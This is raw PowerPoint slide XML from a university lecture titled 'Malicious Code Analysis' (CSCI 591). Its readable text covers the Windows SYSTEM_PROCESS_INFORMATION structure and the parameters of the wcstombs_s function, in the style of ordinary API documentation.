              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2049" h="9323" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2049" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1799" y="1489"/>
                    <a:pt x="775" y="2727"/>
                    <a:pt x="418" y="4251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6037"/>
                    <a:pt x="287" y="7561"/>
                    <a:pt x="656" y="9323"/>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0" name="Google Shape;107;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2445166" y="3074374"/>
              <a:ext cx="10704" cy="53317"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="263" h="1310" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="263" y="1310"/>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1" name="Google Shape;108;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1893723" y="1701334"/>
              <a:ext cx="707040" cy="741188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="17372" h="18211" extrusionOk="0">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2" name="Google Shape;109;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1790996" y="1390959"/>
              <a:ext cx="944973" cy="1381073"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="23218" h="33933" extrusionOk="0">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3" name="Google Shape;110;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1301539" y="3226997"/>
              <a:ext cx="1885590" cy="1256083"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="46329" h="30862" extrusionOk="0">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4" name="Google Shape;111;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1092220" y="3508638"/>
              <a:ext cx="330525" cy="521367"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8121" h="12810" extrusionOk="0">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5" name="Google Shape;112;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1215296" y="3585520"/>
              <a:ext cx="92104" cy="15629"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2263" h="384" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="146" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="1"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2263" y="383"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1737" y="33"/>
                    <a:pt x="557" y="1"/>
                    <a:pt x="146"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6" name="Google Shape;113;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1192993" y="3686821"/>
              <a:ext cx="138665" cy="15100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3407" h="371" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="225" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="0"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3406" y="371"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2582" y="32"/>
                    <a:pt x="844" y="0"/>
                    <a:pt x="225"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7" name="Google Shape;114;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1178951" y="3781610"/>
              <a:ext cx="146886" cy="8018"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3609" h="197" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1526" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="994" y="0"/>
                    <a:pt x="447" y="47"/>
                    <a:pt x="1" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3608" y="197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3608" y="189"/>
                    <a:pt x="2598" y="0"/>
                    <a:pt x="1526"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8" name="Google Shape;115;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1164910" y="3863742"/>
              <a:ext cx="135734" cy="15873"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="390" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="1606" y="389"/>
                    <a:pt x="3007" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3118" y="389"/>
                    <a:pt x="3227" y="387"/>
                    <a:pt x="3334" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3334" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0"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9" name="Google Shape;116;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2600721" y="4533413"/>
              <a:ext cx="364428" cy="137485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8954" h="3378" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="1874"/>
                    <a:pt x="2565" y="3377"/>
                    <a:pt x="4873" y="3377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6249" y="3377"/>
                    <a:pt x="7705" y="2844"/>
                    <a:pt x="8954" y="1537"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7644" y="1"/>
                  </a:ln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0" name="Google Shape;117;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2649683" y="4533413"/>
              <a:ext cx="474928" cy="92877"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11669" h="2282" extrusionOk="0">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1" name="Google Shape;118;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2043946" y="2952235"/>
              <a:ext cx="11640" cy="45625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="286" h="1121" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="286" y="1120"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1"/>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2" name="Google Shape;119;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1964459" y="3547873"/>
              <a:ext cx="589784" cy="661416"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="14491" h="16251" extrusionOk="0">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3" name="Google Shape;120;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2223718" y="3729027"/>
              <a:ext cx="79528" cy="306797"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1954" h="7538" extrusionOk="0">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4" name="Google Shape;121;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2632711" y="2657611"/>
              <a:ext cx="401750" cy="366422"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9871" h="9003" extrusionOk="0">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5" name="Google Shape;122;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2264418" y="4879399"/>
              <a:ext cx="914936" cy="109564"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22480" h="2692" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="1"/>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6" name="Google Shape;123;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2434014" y="5036907"/>
              <a:ext cx="745828" cy="54294"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1334" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1"/>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7" name="Google Shape;124;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2434014" y="5126079"/>
              <a:ext cx="745828" cy="54294"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1334" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324"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8" name="Google Shape;125;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2689895" y="5214764"/>
              <a:ext cx="489947" cy="54782"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12038" h="1346" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12037" y="1345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12037"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9" name="Google Shape;126;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2894859" y="2508365"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">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0" name="Google Shape;127;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1006072"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1" name="Google Shape;128;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-70566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2" name="Google Shape;129;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-40521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3" name="Google Shape;130;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-105261"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4" name="Google Shape;131;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="195186"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5" name="Google Shape;132;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="495633"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6" name="Google Shape;133;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792702"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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="矩形 172"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9970770" y="109855"/>
            <a:ext cx="1960245"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rPr>
              <a:t>2023.09.27</a:t>
            </a:r>
            <a:endPar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11677571" y="6016506"/>
            <a:ext cx="247650" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;54;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731135" y="1773555"/>
            <a:ext cx="6729730" cy="209804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4000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="60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rPr>
              <a:t>Malicious Code Analysis</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="60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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="299085" y="109855"/>
            <a:ext cx="1848142" cy="1296000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;55;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4536123" y="4035425"/>
            <a:ext cx="3119755" cy="749935"/>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Fangtian Zhong</a:t>
            </a:r>
            <a:endPar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CSCI 591</a:t>
            </a:r>
            <a:endPar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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="5492115"/>
            <a:ext cx="6418580"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Gianforte School of Computing </a:t>
            </a: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000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="+mn-ea"/>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E-mail: fangtian.zhong@montana.edu</a:t>
            </a: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SYSTEM_PROCESS_INFORMATION</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9" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222250" y="1083945"/>
            <a:ext cx="4687570" cy="5285105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _SYSTEM_PROCESS_INFORMATION {</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ULONG NextEntryOffset;</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ULONG NumberOfThreads;</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BYTE Reserved1[48];</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UNICODE_STRING ImageName;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KPRIORITY BasePriority;</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HANDLE UniqueProcessId;</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PVOID Reserved2;</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ULONG HandleCount;</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ULONG SessionId;</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PVOID Reserved3;</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PeakVirtualSize;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VirtualSize;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ULONG Reserved4;</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PeakWorkingSetSize;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WorkingSetSize;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PVOID Reserved5;</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QuotaPagedPoolUsage;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PVOID Reserved6;</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QuotaNonPagedPoolUsage;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PagefileUsage;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PeakPagefileUsage;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PrivatePageCount;</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LARGE_INTEGER Reserved7[6];</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SYSTEM_PROCESS_INFORMATION;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907280" y="3140075"/>
            <a:ext cx="7096760" cy="3246120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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NextEntryOffset</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The start of the next item in the array is the address of the previous item plus  the value in the NextEntryOffset member. For the last item in the array, NextEntryOffset is 0.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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ImageName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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The member contains the process's image name.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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BasePriority</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The BasePriority member contains the base priority of the process, which is the starting priority for threads created within the associated process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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PeakVirtualSize</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The member contains the peak size, in bytes, of the virtual memory used by the process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5150485" y="1083945"/>
            <a:ext cx="6891020" cy="2001520"/>
            <a:chOff x="8111" y="1707"/>
            <a:chExt cx="10852" cy="3152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8171" y="1707"/>
              <a:ext cx="10733" cy="3153"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 8909"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CA3E9D">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="CA3E9D"/>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8111" y="1879"/>
              <a:ext cx="10852" cy="2809"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="360045" indent="-179705" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2200">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>These structures contain information about the resource usage of each process, including the number of threads and handles used by the process, the peak page-file usage, and the number of memory pages that the process has allocated.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"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wcstombs_s</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530225" y="4122420"/>
            <a:ext cx="9890125" cy="2266315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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pReturnValue</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The size in bytes of the converted string, including the null terminator.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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mbstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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The address of a buffer for the resulting converted multibyte character string.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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sizeInBytes</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The size in bytes of the mbstr buffer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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wcstr</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Points to the wide character string to be converted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The maximum number of bytes to store in the mbstr buffer, not including the terminating null character, or _TRUNCATE.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589915" y="1158875"/>
            <a:ext cx="3429000" cy="2784475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>errno_t wcstombs_s(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
